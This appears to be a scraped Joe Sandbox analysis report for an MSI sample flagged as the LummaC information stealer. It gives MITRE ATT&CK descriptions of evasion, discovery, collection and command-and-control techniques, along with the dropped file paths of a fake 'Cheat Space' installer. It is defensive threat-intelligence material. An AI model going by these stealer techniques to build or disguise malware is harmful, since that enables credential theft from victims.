Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report BpOyVCAP8g.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\5d1857.rbs

C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe

C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE47B.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE69E.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE6CE.tmp.xml

C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe

C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pip.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\9[1]

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\9[1]

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\MSI3C62.tmp

Windows Analysis Report
BpOyVCAP8g.msi

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre